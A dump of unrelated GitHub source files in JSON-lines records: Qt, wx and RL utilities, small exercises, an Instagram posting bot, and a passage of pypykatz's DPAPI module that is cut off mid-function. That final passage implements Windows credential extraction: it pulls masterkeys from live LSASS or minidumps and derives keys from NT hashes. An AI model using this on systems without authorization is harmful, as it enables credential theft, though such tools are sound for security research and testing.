np.unique(predictions[-10:])[0]==np.argmax(res): \n if res[np.argmax(res)] > threshold: \n \n if len(sentence) > 0: \n if actions[np.argmax(res)] != sentence[-1]:\n sentence.append(actions[np.argmax(res)])\n else:\n sentence.append(actions[np.argmax(res)])\n\n if len(sentence) > 5: \n sentence = sentence[-5:]\n if results.pose_landmarks:\n mpDraw.draw_landmarks(frame_info.frame, results.pose_landmarks,mpPose.POSE_CONNECTIONS)\n # self.Frame_1[int(frame_info.y):int(frame_info.y+frame_info.h),int(frame_info.x):int(frame_info.x+frame_info.w)] = frame_info.frame\n # width = (int)((self.mainForm.centralwidget.width()-227)/2)-10\n # height = (int)((self.mainForm.centralwidget.height()-20)/2)-10\n # pixmap = QtGui.QPixmap(\n # self.convert_image_to_QImage(\n # self.resize_image(frame_info.frame, width, height)\n # # self.resize_image(np.squeeze(result.render()), width, height)\n # ))\n # self.mainForm.cctv_2.setPixmap(pixmap)\n \n # self.mainForm.cctv_2.update()\n else:\n break\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nclass Worker(QThread):\n def __init__(self, target):\n assert callable(target)\n super().__init__()\n self.func = target\n self.isWorking = True\n\n def run(self):\n while self.isWorking:\n self.func()\n self.sleep(0)\n","repo_name":"sorrow4468/SSAFY-final-WooRiA.I","sub_path":"AI/QtApp/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":17456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31045374776","text":"a = int(input(\"\\nPlease Enter Starting Number For Your List: \"))\nb = int(input(\"Please Enter Ending Number For Your List: \"))\nnum = list (range(a,b+1))\nprint(f\"\\nThis is Your List: {num}\")\n\n# Reverse function\ndef r_ls(l):\n return l[::-1]\nprint(f\"\\nReverse of your List: {r_ls(num)}\")\n\n# pop append method\n\ndef reverse_ls(ls):\n reverse = []\n for i in range (len(ls)):\n pop_item = ls.pop()\n reverse.append(pop_item)\n return reverse\nprint(f\"\\nReverse of Your List: {reverse_ls(num)}\")\n","repo_name":"arpitgupta630/Python","sub_path":"Youtube/C05E02.py","file_name":"C05E02.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20804552785","text":"import schedule\nimport requests\nimport os\nimport time\nimport shutil\nfrom instagrapi import Client\nfrom uuid import uuid4\n\nTHIS_PERSON_DOES_NOT_EXIST = 'https://thispersondoesnotexist.com/image'\nDEFAULT_CAPTION = f'This Person does not exist!\\nCredits to {THIS_PERSON_DOES_NOT_EXIST}'\nCACHE_DIR = r'./.cache/'\nFILE_EXTENSION = '.jpg'\n\ndef store_new_image() -> str:\n image_id = str(uuid4())\n response = requests.get(THIS_PERSON_DOES_NOT_EXIST, stream=True)\n if response.status_code != 200:\n print('Something went wrong when requesting new image.')\n print(f'Status Code = {response.status_code}')\n print(f'Content = {response.text}')\n return store_new_image()\n with open(CACHE_DIR + image_id + FILE_EXTENSION, 'wb') as image:\n shutil.copyfileobj(response.raw, image)\n image.close()\n print('Successfully downloaded new image: ' + image_id)\n return image_id\n\ndef post_new_image(client: Client, image: str, caption: str=DEFAULT_CAPTION):\n media = client.photo_upload(CACHE_DIR + image + FILE_EXTENSION, caption).dict()\n image_id, taken_at = media['id'], media['taken_at']\n print(f'Uploaded new Image {image}: \\nid = {image_id}\\ntaken_at = {taken_at}')\n\ndef run_schedule(client):\n image_id = store_new_image()\n post_new_image(client, image_id)\n \nif __name__ == '__main__':\n print('Creating Cache storage if not existing...')\n if not os.path.exists(CACHE_DIR):\n os.mkdir(CACHE_DIR)\n print(f'Created {CACHE_DIR} for caching images')\n username = os.getenv('USERNAME')\n password = os.getenv('PASSWORD')\n client = Client()\n client.login(username, password)\n schedule.every(12).hours.do(run_schedule, client)\n while True:\n schedule.run_pending()\n time.sleep(5)\n","repo_name":"MoMMde/this-person-is-on-instagram","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3414689965","text":"\"\"\"\n\n\"\"\"\nfrom PyQt5.QtCore import Qt, QObject, QSortFilterProxyModel, pyqtSlot\nfrom PyQt5.QtSql import QSqlTableModel\n\nfrom genial.controllers.propertiescontroller import PropertiesController\nfrom genial import application\n\n\nclass PropertiesService(QObject):\n controller = None # type: PropertiesController\n question_type_model = None # type: QSqlTableModel\n question_type_filter_proxy_model = None # type: 'QuestionTypeFilterProxyModel'\n\n def __init__(self, parent=None):\n QObject.__init__(self, parent)\n self.connect_slots()\n\n def connect_slots(self):\n application.app.aboutToQuit.connect(\n self.on_about_to_quit\n )\n\n def dispose(self):\n pass\n\n def show(self, tab_wanted: str = 'general'):\n from genial.services import document_service\n if document_service.database is not None:\n if self.question_type_model is None:\n self.question_type_model = QSqlTableModel(\n self,\n document_service.database\n )\n self.question_type_model.setTable(\"question_type\")\n self.question_type_model.setEditStrategy(\n QSqlTableModel.OnManualSubmit\n )\n self.question_type_filter_proxy_model = QuestionTypeFilterProxyModel()\n self.question_type_filter_proxy_model.setSourceModel(\n self.question_type_model\n )\n self.question_type_filter_proxy_model.sort(\n self.question_type_model.fieldIndex(\"position\"),\n Qt.AscendingOrder\n )\n self.question_type_filter_proxy_model.setDynamicSortFilter(True)\n\n if self.controller is None:\n self.controller = PropertiesController()\n self.controller.start()\n self.controller.show(tab_wanted)\n\n @pyqtSlot()\n def on_about_to_quit(self):\n self.dispose()\n\n\nclass QuestionTypeFilterProxyModel (QSortFilterProxyModel):\n pass\n\n","repo_name":"adamscott/genial","sub_path":"genial/services/propertiesservices.py","file_name":"propertiesservices.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1958969573","text":"\nfrom virtual_modi.virtual_module.virtual_module import VirtualModule\n\n\nclass VirtualDial(VirtualModule):\n\n DEGREE = 2\n TURNSPEED = 3\n\n def __init__(self, message_handler):\n super(VirtualDial, self).__init__(message_handler)\n self.type = 'dial'\n self.uuid = self.generate_uuid(0x2040)\n\n self.degree = 0\n self.turnspeed = 0\n\n self.attach()\n\n def run(self):\n self.send_property_message(self.DEGREE, self.degree)\n self.send_property_message(self.TURNSPEED, self.turnspeed)\n","repo_name":"LUXROBO/virtual-modi","sub_path":"virtual_modi/virtual_module/virtual_input_module/virtual_dial.py","file_name":"virtual_dial.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185644350","text":"L, R = map(int, input().split(\" \"))\nmod = 10**9 + 7\n\nn = 1\ni = 0\nln, rn = -1, -1\nwhile True:\n if ln == -1 and (n - 1) >= L:\n ln = i - 1\n\n if rn == -1 and (n - 1) >= R:\n rn = i\n break\n n *= 2\n i += 1\n\nprint(ln, rn)\nans = (pow(rn, 3, mod) - pow(ln, 3, mod) + mod) % mod\nprint(ans)\nls = 2**ln\nfor i in range(ls, L):\n for j in range(i, L):\n if (j % i) == (j ^ i):\n ans -= 1\nrd = 2**rn\nfor i in range(R + 1, rd):\n for j in range(i, rd):\n if (j % i) == (j ^ i):\n ans -= 1\n\nprint((ans + mod) % mod)","repo_name":"banboooo044/AtCoder","sub_path":"ABC138/F2.py","file_name":"F2.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27113974680","text":"# import wx\n \n# app = wx.App()\n \n# frame = wx.Frame(None, -1)\n \n# # Create text input\n# dlg = wx.TextEntryDialog(frame, 'Enter some text','Text Entry')\n# dlg.SetSize(0,0,200,50)\n# dlg.SetWindowStyle(wx.STAY_ON_TOP )\n# dlg.SetValue(\"Default\")\n# if dlg.ShowModal() == wx.ID_OK:\n# print('You entered: %s\\n' % dlg.GetValue())\n# dlg.Destroy()\n\nimport wx\n \n########################################################################\nclass StayOnTopFrame(wx.Frame):\n \"\"\"\n A frame that stays on top of all the others\n \"\"\"\n \n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n on_top = wx.DEFAULT_FRAME_STYLE | wx.STAY_ON_TOP\n wx.Frame.__init__(self, None, title=\"Stay on top\", style=on_top)\n panel = wx.Panel(self)\n self.Show()\n \n#----------------------------------------------------------------------\nif __name__ == \"__main__\":\n app = wx.App(False)\n frame = StayOnTopFrame()\n app.MainLoop()","repo_name":"asqum/PYQUM","sub_path":"TEST/BETAsite/PyGUI/User_Dialogue_wx.py","file_name":"User_Dialogue_wx.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26877461815","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.join(\"../../\", \"src\")))\nimport gym\nimport numpy as np\nimport argparse\nfrom tensorboardX import SummaryWriter\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.utils as nn_utils\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom common import hyperparameters\nfrom common import utils\nimport ptan\nimport time\n\n\ndef unpack_batch(batch, net, device=\"cpu\"):\n \"\"\"Takes in a batch of environment transitions\n\n Args:\n batch: batch of stored experiences/environment transitions\n net: neural network\n device: cpu or cuda\n\n Returns:\n states variable, actions tensor, Q values\n \"\"\"\n\n params = hyperparameters.PARAMS[\"pong_a2c\"]\n states = []\n actions = []\n rewards = []\n not_done_idx = []\n last_states = []\n\n for idx, exp in enumerate(batch):\n states.append(np.array(exp.state, copy=False))\n actions.append(int(exp.action))\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(np.array(exp.last_state, copy=False))\n\n states_v = torch.FloatTensor(states).to(device)\n actions_t = torch.LongTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n\n if not_done_idx:\n last_states_v = torch.FloatTensor(last_states).to(device)\n last_vals_v = net(last_states_v)[1]\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += (\n params[\"gamma\"] ** params[\"step_count\"] * last_vals_np\n )\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_t, ref_vals_v\n\n\ndef unpack_batch_continuous(batch, net, last_val_gamma, device=\"cpu\"):\n \"\"\"\n Convert batch into training tensors\n :param batch:\n :param net:\n :return: states variable, actions tensor, reference values variable\n \"\"\"\n states = []\n actions = []\n rewards = []\n not_done_idx = []\n last_states = []\n for idx, exp in enumerate(batch):\n states.append(exp.state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(exp.last_state)\n states_v = utils.float32_preprocessor(states).to(device)\n actions_v = torch.FloatTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n if not_done_idx:\n last_states_v = utils.float32_preprocessor(last_states).to(device)\n last_vals_v = net(last_states_v)[2]\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += last_val_gamma * last_vals_np\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_v, ref_vals_v\n\n\ndef unpack_batch_a2c(batch, net, last_val_gamma, device=\"cpu\"):\n \"\"\"\n Convert batch into training tensors\n :param batch:\n :param net:\n :return: states variable, actions tensor, reference values variable\n \"\"\"\n states = []\n actions = []\n rewards = []\n not_done_idx = []\n last_states = []\n for idx, exp in enumerate(batch):\n states.append(exp.state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n if exp.last_state is not None:\n not_done_idx.append(idx)\n last_states.append(exp.last_state)\n states_v = ptan.agent.float32_preprocessor(states).to(device)\n actions_v = torch.FloatTensor(actions).to(device)\n\n # handle rewards\n rewards_np = np.array(rewards, dtype=np.float32)\n if not_done_idx:\n last_states_v = ptan.agent.float32_preprocessor(last_states).to(device)\n last_vals_v = net(last_states_v)\n last_vals_np = last_vals_v.data.cpu().numpy()[:, 0]\n rewards_np[not_done_idx] += last_val_gamma * last_vals_np\n\n ref_vals_v = torch.FloatTensor(rewards_np).to(device)\n return states_v, actions_v, ref_vals_v\n\n\ndef test_net(net, env, count=10, device=\"cpu\"):\n \"\"\"Iterates through several episodes with no exploration or updates to test performance of current agent\n Args:\n net: network to be used for testing\n env: environment used\n count: number of episodes to run\n device: cpu or cuda\n\n Returns:\n average reward and average number of steps\n\n \"\"\"\n rewards = 0.0\n steps = 0\n for _ in range(count):\n obs = env.reset()\n while True:\n obs_v = ptan.agent.float32_preprocessor([obs]).to(device)\n mu_v = net(obs_v)[0]\n action = mu_v.squeeze(dim=0).data.cpu().numpy()\n action = np.clip(action, -1, 1)\n obs, reward, done, _ = env.step(action)\n rewards += reward\n steps += 1\n if done:\n break\n return rewards / count, steps / count\n\n\ndef run_test(net, env, device=\"cpu\"):\n ts = time.time()\n rewards, steps = test_net(net, env, device=device)\n print(\"Test done in %.2f sec, reward %.3f, steps %d\" % (\n time.time() - ts, rewards, steps))\n\n return rewards, steps\n","repo_name":"djbyrne/RL_Workbench","sub_path":"algos/actor_critic/ac_common.py","file_name":"ac_common.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69817134250","text":"from orator.migrations import Migration\n\n\nclass CreateFavoritesTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('favorites') as table:\n table.increments('id')\n\n table.integer('user_id').unsigned()\n table.foreign('user_id').references('id').on('users')\n\n table.integer('article_id').unsigned()\n table.foreign('article_id').references('id').on('articles')\n \n table.timestamps()\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('favorites')\n","repo_name":"vaibhavmule/masonite-realworld-example-app","sub_path":"databases/migrations/2019_01_21_035044_create_favorites_table.py","file_name":"2019_01_21_035044_create_favorites_table.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"20123724542","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n# \n# Kudos:\n# Processus Thief (@ProcessusT)\n#\n#\n\nimport os\nimport ntpath\nimport json\nimport hmac\nimport glob\nimport sqlite3\nimport base64\nimport platform\nfrom hashlib import sha1, pbkdf2_hmac\n\nimport xml.etree.ElementTree as ET\n\nfrom pypykatz import logger\nfrom pypykatz.dpapi.structures.masterkeyfile import MasterKeyFile\nfrom pypykatz.dpapi.structures.credentialfile import CredentialFile, CREDENTIAL_BLOB\nfrom pypykatz.dpapi.structures.blob import DPAPI_BLOB\nfrom pypykatz.dpapi.structures.vault import VAULT_VCRD, VAULT_VPOL, VAULT_VPOL_KEYS\nfrom unicrypto.hashlib import md4 as MD4\nfrom unicrypto.symmetric import AES, MODE_GCM, MODE_CBC\nfrom winacl.dtyp.wcee.pvkfile import PVKFile\nfrom pypykatz.commons.common import UniversalEncoder, base64_decode_url\n\n\nfrom cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15\n\n\nif platform.system().lower() == 'windows':\n\tfrom pypykatz.commons.winapi.processmanipulator import ProcessManipulator\n\n\"\"\"\nSo! DPAPI...\n\nIn order to decrpyt a file/blob/data of any kind you must obtain a masterkey.\nMasterkey can be obtained either from the LSASS process, or by decrypting a masterkeyfile. LSASS is straightforward, succsessfully dumping it will give you all the plaintext masterkeys with the appropriate GUID.\n But if you can't use LSASS, you have to obtain the masterkey file, and decrypt it with an appropriate key. (too many keys, I know...)\n Masterkey files can be located in '%APPDATA%\\Microsoft\\Protect\\%SID%' for each user or '%SYSTEMDIR%\\Microsoft\\Protect' for the SYSTEM user. But how to decrypt them?\n A masterkeyfile can contain multiple different keys, a masterkey is one of them. The masterkey is stored encrypted in the masterkeyfile, and is encrypted with a key that can be either a key stored in registry (LSA secrets) or not. In case the LSA DPAPI keys are not valid, you will need to use the NT hash of the user's password or the user's plaintext password itself. BUT! deriving the key from the password and the SID will yield 3 different keys, and so far noone could tell what key is the correct one to be used.\n Solution for decrypting a masterkey in the mastereky file: harvest as many key candidates as possible and try to decrypt the masterkey. Much to our luck, verifying the signature data after decryption can tell us if the decrpytion was sucsessfull, so we can tell if the masterkey decrypted correctly or not.\n\nBut you may ask: I see a lot of different masterkey files, how can I tell which one is used for my <credential file/vault files/blob>. The answer: a masterkeyfile stores GUID of the keys it stores (eg. the masterkey), and so does your <secret> data sructure for the appropriate key. Therefore it's easy to tell which file to decrypt for a given <secret>\n\nBUT WAIT! THERE IS MORE!\n\nDPAPI is also used to decrypt stroed secrets in Windows Vault and Credential files.\nCredential files:\n\t1. standalone file, inside it there is a DPAPI_BLOB.\n\t2. DPAPI_BLOB can be decrypted with the corresponding masterkey\n\t3. After decryption you'll find a CREDENTIAL_BLOB strucutre.\n\t4. CREDENTIAL_BLOB strucutre has the plaintext secrets, but it's not possible to tell in which filed they are stored. You'll need to check them by hand :)\n\t\nVault files (VCRD and VPOL):\n\tVCRD file holds the secrets encrypted. The decrpytion key is stored in the VPOL file, but also encryted. The VPOL file's decryption key is a masterkey. The masterkey is stored in a Masterkeyfile...\n\t1. Need to find the masterkey to decrypt the VPOL file\n\t2. VPOL file will give two keys after sucsessful decryption\n\t3. There is no way to tell (atm) which key will be the correct one to decrypt the VCRD file\n\t4. The VCRD file has a lot of stored secrets, called attributes. Each attribute is encrypted with one of the keys from the VPOL file\n\t5. For each attribute: for each key: decrypt attribute.\n\t6. Check manually if one of them sucseeded because there are no integrity checks, so no way to tell programatically which key worked.\n\t\nPath to decrypt stuff:\n\tSub-sections are options of how to get the keys\n\t\n\t1. pre_masterkey:\n\t\ta, from user password and SID\n\t\tb, from user NT hash and SID\n\t\tc, from live registry SYSTEM cached DPAPI key or SAM cache NT hash and SID\n\t\td, from offline registry hives\n\t\t\n\t2. masterkey:\n\t\ta, from masterkeyfile + pre_masterkey\n\t\tb, from live LSASS dump\n\t\tc, from offline LSASS dump\n\t\t\n\t3. credential file:\n\t\ta, masterkey + credential_file\n\t\t\n\t3. VPOL file:\n\t\ta, masterkey + VPOL file\n\t\t\n\t3. VCRED file:\n\t\ta, VPOL file + VCRED file\n\t\t\n\t3. DPAPI_BLOB:\n\t\ta, masterkey\n\nTODO: A LOT! currently fetching backupkeys from the DC is not supported. and probably missing a lot of things in the strucutre parsing :(\n\"\"\"\n\nclass DPAPI:\n\tdef __init__(self, use_winapi = False):\n\t\tself.use_winapi = use_winapi\n\t\tself.prekeys = {} #keys in bytes format stored in a dict for avoiding dupes\n\t\t\n\t\t#masterkey, backupkey\n\t\tself.masterkeys = {} #guid -> binary value\n\t\tself.backupkeys = {} #guid -> binary value\n\t\t\n\t\t#since so far I dunno how to match vault-keys to vaults, its a list :(\n\t\tself.vault_keys = []\n\t\n\n\tdef dump_pre_keys(self, filename = None):\n\t\tif filename is None:\n\t\t\tfor x in self.prekeys:\n\t\t\t\tprint(x.hex())\n\t\telse:\n\t\t\twith open(filename, 'w', newline = '') as f:\n\t\t\t\tfor x in self.prekeys:\n\t\t\t\t\tf.write(x.hex() + '\\r\\n')\n\n\tdef load_prekeys(self, filename):\n\t\ttry:\n\t\t\topen(filename, 'r')\n\t\texcept Exception as e:\n\t\t\tkey = bytes.fromhex(filename)\n\t\t\tself.prekeys[key] = 1\n\t\t\treturn\n\t\telse:\n\t\t\twith open(filename, 'r') as f:\n\t\t\t\tfor line in f:\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tself.prekeys[bytes.fromhex(line)] = 1\n\n\tdef dump_masterkeys(self, filename = None):\n\t\tif filename is None:\n\t\t\tfor x in self.masterkeys:\n\t\t\t\tprint('[GUID] %s [MASTERKEY] %s' % (x, self.masterkeys[x].hex()))\n\t\t\tfor x in self.backupkeys:\n\t\t\t\tprint('[GUID] %s [BACKUPKEY] %s' % (x, self.backupkeys[x].hex()))\n\t\telse:\n\t\t\twith open(filename, 'w', newline = '') as f:\n\t\t\t\tt = { 'masterkeys' : self.masterkeys, 'backupkeys': self.backupkeys}\n\t\t\t\tf.write(json.dumps(t, cls = UniversalEncoder, indent=4, sort_keys=True))\n\n\tdef load_masterkeys(self, filename):\n\t\twith open(filename, 'r') as f:\n\t\t\tdata = json.loads(f.read())\n\t\t\n\n\t\tfor guid in data['backupkeys']:\n\t\t\tself.backupkeys[guid] = bytes.fromhex(data['backupkeys'][guid])\n\t\tfor guid in data['masterkeys']:\n\t\t\tself.masterkeys[guid] = bytes.fromhex(data['masterkeys'][guid])\n\n\t\t\n\tdef get_prekeys_from_password(self, sid, password = None, nt_hash = None):\n\t\t\"\"\"\n\t\tCreates pre-masterkeys from user SID and password of nt hash.\n\t\tIf NT hash is provided the function can only generate 2 out of the 3 possible keys, \n\t\tthis is because one of the derived keys relies ion the SHA1 hash of the user password\n\t\t\n\t\tsid: user's SID as a string\n\t\tpassword: user's password. optional. if not provided, then NT hash must be provided\n\t\tnt_hash: user's NT hash. optional if not provided, the password must be provided\n\t\t\"\"\"\n\t\tif password is None and nt_hash is None:\n\t\t\traise Exception('Provide either password or NT hash!')\n\t\t\n\t\tif password is None and nt_hash:\n\t\t\tif isinstance(nt_hash, str):\n\t\t\t\tnt_hash = bytes.fromhex(nt_hash)\n\t\t\tkey1 = None\n\t\t\n\t\tif password or password == '':\n\t\t\tctx = MD4(password.encode('utf-16le'))\n\t\t\tnt_hash = ctx.digest()\n\n\t\t\t# Will generate two keys, one with SHA1 and another with MD4\n\t\t\tkey1 = hmac.new(sha1(password.encode('utf-16le')).digest(), (sid + '\\0').encode('utf-16le'), sha1).digest()\n\t\t\n\t\tkey2 = hmac.new(nt_hash, (sid + '\\0').encode('utf-16le'), sha1).digest()\n\t\t# For Protected users\n\t\ttmp_key = pbkdf2_hmac('sha256', nt_hash, sid.encode('utf-16le'), 10000)\n\t\ttmp_key_2 = pbkdf2_hmac('sha256', tmp_key, sid.encode('utf-16le'), 1)[:16]\n\t\tkey3 = hmac.new(tmp_key_2, (sid + '\\0').encode('utf-16le'), sha1).digest()[:20]\n\t\t\n\t\tif key1 is not None:\n\t\t\tself.prekeys[key1] = 1\n\t\tself.prekeys[key2] = 1\n\t\tself.prekeys[key3] = 1\n\t\t\n\t\tif key1 is not None:\n\t\t\tlogger.debug('Prekey_1 %s %s %s %s' % (sid, password, nt_hash, key1.hex()))\n\t\tlogger.debug('Prekey_2 %s %s %s %s' % (sid, password, nt_hash, key2.hex()))\n\t\tlogger.debug('Prekey_3 %s %s %s %s' % (sid, password, nt_hash, key3.hex()))\n\t\t\n\t\treturn key1, key2, key3\n\t\t\t\t\n\tdef __get_registry_secrets(self, lr):\n\t\t\"\"\"\n\t\tGets the pre-keys from an already parsed OffineRegistry or LiveRegistry object, populates the userkey/machinekey lists, returns the obtained keys\n\t\t\n\t\tlr: OffineRegistry or LiveRegistry object\n\t\treturn: touple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tuser = []\n\t\tmachine = []\n\t\tfrom pypykatz.registry.security.common import LSASecretDPAPI\n\n\t\tif lr.security:\n\t\t\tfor secret in lr.security.cached_secrets:\n\t\t\t\tif isinstance(secret, LSASecretDPAPI):\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)\n\t\t\t\t\tlogger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)\n\t\t\t\t\tself.prekeys[secret.user_key] = 1\n\t\t\t\t\tuser.append(secret.user_key)\n\t\t\t\t\tself.prekeys[secret.machine_key] = 1\n\t\t\t\t\tmachine.append(secret.machine_key)\n\t\t\n\t\tif lr.sam is not None:\n\t\t\tfor secret in lr.sam.secrets:\n\t\t\t\tif secret.nt_hash:\n\t\t\t\t\tsid = '%s-%s' % (lr.sam.machine_sid, secret.rid)\n\t\t\t\t\tx, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)\n\t\t\t\t\tlogger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))\n\t\t\t\t\tuser.append(key2)\n\t\t\t\t\tuser.append(key3)\n\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\treturn user, machine\n\t\n\tdef get_prekeys_form_registry_live(self):\n\t\t\"\"\"\n\t\t\n\t\treturn: touple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tfrom pypykatz.registry.live_parser import LiveRegistry\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = LiveRegistry.go_live()\n\t\texcept Exception as e:\n\t\t\tlogger.debug('[DPAPI] Failed to obtain registry secrets via direct registry reading method')\n\t\t\ttry:\n\t\t\t\tlr = OffineRegistry.from_live_system()\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('[DPAPI] Failed to obtain registry secrets via filedump method')\n\t\t\n\t\tif lr is not None:\n\t\t\treturn self.__get_registry_secrets(lr)\n\n\t\telse:\n\t\t\traise Exception('Registry parsing failed!')\n\t\t\t\n\tdef get_prekeys_form_registry_files(self, system_path, security_path, sam_path = None):\n\t\t\"\"\"\n\t\t\n\t\treturn: touple of two lists, [0] userkeys [1] machinekeys\n\t\t\"\"\"\n\t\tfrom pypykatz.registry.offline_parser import OffineRegistry\n\t\tlr = None\n\t\ttry:\n\t\t\tlr = OffineRegistry.from_files(system_path, sam_path = sam_path, security_path = security_path)\n\t\texcept Exception as e:\n\t\t\tlogger.error('[DPAPI] Failed to obtain registry secrets via direct registry reading method. Reason: %s' %e)\n\t\t\n\t\tif lr is not None:\n\t\t\treturn self.__get_registry_secrets(lr)\n\n\t\telse:\n\t\t\traise Exception('[DPAPI] Registry parsing failed!')\n\t\t\t\n\tdef get_all_keys_from_lsass_live(self):\n\t\t\"\"\"\n\t\tParses the live LSASS process and extracts the plaintext masterkeys, and also generates prekeys from all available credentials\n\t\tIt does not retun anything, just sets up all key material in the object\n\t\treturn: None\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.go_live()\n\t\tsids = [katz.logon_sessions[x].sid for x in katz.logon_sessions]\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\t\t\t\n\t\t\tfor package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():\n\t\t\t\tif package.lower() == 'dpapi':\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tsids = [katz.logon_sessions[x].sid]\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif plaintext is not None:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)\n\t\t\t\t\tif nthex is not None and len(nthex) == 32:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = None, nt_hash = nthex)\n\t\t\t\t\n\t\t\t\tif shahex is not None and len(shahex) == 40:\n\t\t\t\t\tself.prekeys[bytes.fromhex(shahex)] = 1\n\t\t\t\n\tdef get_masterkeys_from_lsass_live(self):\n\t\t\"\"\"\n\t\tParses the live LSASS process and extracts the plaintext masterkeys\n\t\t\n\t\treturn: dictionary of guid->keybytes\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.go_live()\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\t\t\n\t\treturn self.masterkeys\n\t\t\t\t\n\tdef get_masterkeys_from_lsass_dump(self, file_path):\n\t\t\"\"\"\n\t\tParses the mindiump of an LSASS process file and extracts the plaintext masterkeys\n\t\t\n\t\tfile_path: path to the mindiump file\n\t\treturn: dictionary of guid->keybytes\n\t\t\"\"\"\n\t\tfrom pypykatz.pypykatz import pypykatz\n\t\tkatz = pypykatz.parse_minidump_file(file_path)\n\t\tfor x in katz.logon_sessions:\n\t\t\tfor dc in katz.logon_sessions[x].dpapi_creds:\n\t\t\t\tlogger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % dc.key_guid)\n\t\t\t\tself.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)\n\n\t\tfor package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():\n\t\t\t\tif package.lower() == 'dpapi':\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tsids = [katz.logon_sessions[x].sid]\n\t\t\t\tfor sid in sids:\n\t\t\t\t\tif plaintext is not None:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)\n\t\t\t\t\tif nthex is not None and len(nthex) == 32:\n\t\t\t\t\t\tself.get_prekeys_from_password(sid, password = None, nt_hash = nthex)\n\t\t\t\t\n\t\t\t\tif shahex is not None and len(shahex) == 40:\n\t\t\t\t\tself.prekeys[bytes.fromhex(shahex)] = 1\n\t\t\t\t\n\t\treturn self.masterkeys\n\n\tdef decrypt_masterkey_file_with_pvk(self, mkffile, pvkfile):\n\t\t\"\"\"\n\t\tDecrypting the 